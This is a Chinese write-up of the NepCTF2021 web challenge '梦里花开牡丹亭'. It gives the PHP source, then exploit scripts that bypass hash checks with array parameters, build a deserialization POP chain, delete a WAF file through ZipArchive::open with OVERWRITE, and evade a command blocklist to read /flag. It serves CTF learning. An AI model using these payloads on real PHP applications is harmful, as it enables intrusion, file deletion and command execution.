NepCTF2021 梦里花开牡丹亭

知识点
1.数组绕过
2.pop链
3.ZipArchive 内置类的open方法达到删除文件效果
php内置类ZipArchive :: open（$filename, $flags = null）中的flags参数如果设置为ZipArchive::OVERWRITE的话，可以把指定文件删除。这里我们跟进方法可以看到const OVERWRITE = 8;也就是将OVERWRITE定义为了常量8，我们在调用时也可以直接将flags赋值为8。
利用条件需要存在这么个open函数，看到open以后可以联想到这了

源码

<?php
highlight_file(__FILE__);
error_reporting(0);
include('shell.php');
class Game{public  $username;public  $password;public  $choice;public  $register;public  $file;public  $filename;public  $content;public function __construct(){$this->username='user';$this->password='user';}public function __wakeup(){if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){$this->choice=new login($this->file,$this->filename,$this->content);}else{$this->choice = new register();}}public function __destruct() {$this->choice->checking($this->username,$this->password);}}
class login{public $file;public $filename;public $content;public function __construct($file,$filename,$content){$this->file=$file;$this->filename=$filename;$this->content=$content;}public function checking($username,$password){if($username==='admin'&&$password==='admin'){$this->file->open($this->filename,$this->content);die('login success you can to open shell file!');}}
}
class register{public function checking($username,$password){if($username==='admin'&&$password==='admin'){die('success register admin');}else{die('please register admin ');}}
}
class Open{function open($filename, $content){if(!file_get_contents('waf.txt')){shell($content);}else{echo file_get_contents($filename.".php");}}
}
if($_GET['a']!==$_GET['b']&&(md5($_GET['a']) === md5($_GET['b'])) && (sha1($_GET['a'])=== sha1($_GET['b']))){@unserialize(base64_decode($_POST['unser']));
}

if(md5($this->register)===“21232f297a57a5a743894a0e4a801fc3”)

找个md5在线解密即可 md5解密
解密得到要等于admin。

pop链思路都挺简单的就不多说了。

先看一下shell.php吧
payload

<?php
class Game{public  $username;public  $password;public  $choice;public  $register="admin";public  $file;public  $filename='shell';public  $content;public function __construct(){$this->username='admin';$this->password='admin';}public function __wakeup(){if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){$this->choice=new login($this->file,$this->filename,$this->content);}else{$this->choice = new register();}}public function __destruct() {$this->choice->checking($this->username,$this->password);}}
class login{public $file;public $filename;public $content;public function __construct($file,$filename,$content){$this->file=$file;$this->filename=$filename;$this->content=$content;}public function checking($username,$password){if($username==='admin'&&$password==='admin'){$this->file->open($this->filename,$this->content);die('login success you can to open shell file!');}}
}
class register{public function checking($username,$password){if($username==='admin'&&$password==='admin'){die('success register admin');}else{die('please register admin ');}}
}
class Open{function open($filename, $content){if(!file_get_contents('1.txt')){shell($content);}else{echo file_get_contents($filename.".php");}}
}
$a=new Game();
$a->file=new Open();echo base64_encode(serialize($a));
?>

?a[]=1&b[]=2
unser=Tzo0OiJHYW1lIjo3OntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjU6ImFkbWluIjtzOjY6ImNob2ljZSI7TjtzOjg6InJlZ2lzdGVyIjtzOjU6ImFkbWluIjtzOjQ6ImZpbGUiO086NDoiT3BlbiI6MDp7fXM6ODoiZmlsZW5hbWUiO3M6NToic2hlbGwiO3M6NzoiY29udGVudCI7Tjt9

得到shell.php回显

<?php
function shell($cmd){if(strlen($cmd)<10){if(preg_match('/cat|tac|more|less|head|tail|nl|tail|sort|od|base|awk|cut|grep|uniq|string|sed|rev|zip|\*|\?/',$cmd)){die("NO");}else{return system($cmd);}}else{die('so long!'); }
}login success you can to open shell file!

然后删waf.txt,执行shell函数。

利用ZipArchive原生类调用open方法
ZipArchive :: open（$filename, ZipArchive::OVERWRITE）
即可删除$filename。
ZipArchive::OVERWRITE 是有个数值，OVERWRITE相当于ZipArchive类的有个类常量。

删除waf.txt

<?php
class Game{public  $username;public  $password;public  $choice;public  $register="admin";public  $file;public  $filename='waf.txt';public  $content=ZipArchive::OVERWRITE;public function __construct(){$this->username='admin';$this->password='admin';}public function __wakeup(){if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){$this->choice=new login($this->file,$this->filename,$this->content);}else{$this->choice = new register();}}public function __destruct() {$this->choice->checking($this->username,$this->password);}}
class login{public $file;public $filename;public $content;public function __construct($file,$filename,$content){$this->file=$file;$this->filename=$filename;$this->content=$content;}public function checking($username,$password){if($username==='admin'&&$password==='admin'){$this->file->open($this->filename,$this->content);die('login success you can to open shell file!');}}
}
class register{public function checking($username,$password){if($username==='admin'&&$password==='admin'){die('success register admin');}else{die('please register admin ');}}
}
class Open{function open($filename, $content){if(!file_get_contents('1.txt')){shell($content);}else{echo file_get_contents($filename.".php");}}
}
$a=new Game();
$a->file=new ZipArchive();echo base64_encode(serialize($a));
?>

最后 n\l /flag即可

<?php
class Game{public  $username;public  $password;public  $choice;public  $register="admin";public  $file;public  $filename='waf.txt';public  $content='n\l /flag';public function __construct(){$this->username='admin';$this->password='admin';}public function __wakeup(){if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){$this->choice=new login($this->file,$this->filename,$this->content);}else{$this->choice = new register();}}public function __destruct() {$this->choice->checking($this->username,$this->password);}}
class login{public $file;public $filename;public $content;public function __construct($file,$filename,$content){$this->file=$file;$this->filename=$filename;$this->content=$content;}public function checking($username,$password){if($username==='admin'&&$password==='admin'){$this->file->open($this->filename,$this->content);die('login success you can to open shell file!');}}
}
class register{public function checking($username,$password){if($username==='admin'&&$password==='admin'){die('success register admin');}else{die('please register admin ');}}
}
class Open{function open($filename, $content){if(!file_get_contents('1.txt')){shell($content);}else{echo file_get_contents($filename.".php");}}
}
$a=new Game();
$a->file=new Open();echo base64_encode(serialize($a));
?>

然后就ok了
有什么错误，欢迎师傅们纠正。

NepCTF2021 梦里花开牡丹亭相关推荐

CTF php反序列化总结
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~ php反序列化定义:序列化就是将对象转换成字符串.反 ...
PHP反序列化原生类利用
前言之前对反序列化原生类进行过总结,但可能总结的方面不同,在ctf用到的很少,所以这里在对ctf常用原生类进行一次总结. 原生类 php中内置很多原生的类,在CTF中常以echo new $a($b ...
NepCTF2021一些web题目的总结与复现
前言参加了今年的NepCTF,题目质量很好,就是周末事情比较多,而且只会php,没有全身心去做,所以当时只做了两道题目,赛后认真看了一下php,因为只会php(我太菜了呜呜呜),主要还是提供思路,还 ...
nepctf2021
web little_trick 非常简单的命令执行绕过 substr(0,-1)从最后开始过, echo`nl%20*`; 梦里花开牡丹亭 <?php highlight_file(__FIL ...
NepCTF2021-Web部分(除画皮)
文章目录 little_trick faka_revenge Easy_Tomcat bbxhh_revenge 非预期预期梦里花开牡丹亭 gamejs little_trick 打开环境发现代码 ...
[NepCTF]WEB
little_trick <?phperror_reporting(0);highlight_file(__FILE__);$nep = $_GET['nep'];$len = $_GET['l ...
《牡丹亭》中的情与理
明代著名戏剧家汤显祖,字义仍,号海若,自署清远道人,晚号茧翁,江西临川(今江西抚州市)人,生于明世宗嘉靖二十九年(公元1550年),卒于明神宗万历四十四年(公元1616年).他的不朽剧作<牡丹亭 ...
王喆的牡丹亭_万金油_新浪博客
寂寞牡丹盛开一抹嫣然孤独的人怎令芳心震颤谁把长亭外的邂逅当成毕生缠绵谁把凄美的传说错乱半世姻缘荒芜时空陷入几多痴缠凡世间红尘分作两半那张记忆中的容颜如此美轮美奂 ...
Imc连环画《牡丹亭》
适合手机阅读的Imc格式连环画册,其中320X400适合于Android和Ophone手机,240X280适合于WindowsMobile手机.这本连环画可以在CSDN或51CTO上找到和下载. 阅读 ...

NepCTF2021 梦里花开牡丹亭

源码

NepCTF2021 梦里花开牡丹亭相关推荐

最新文章

热门文章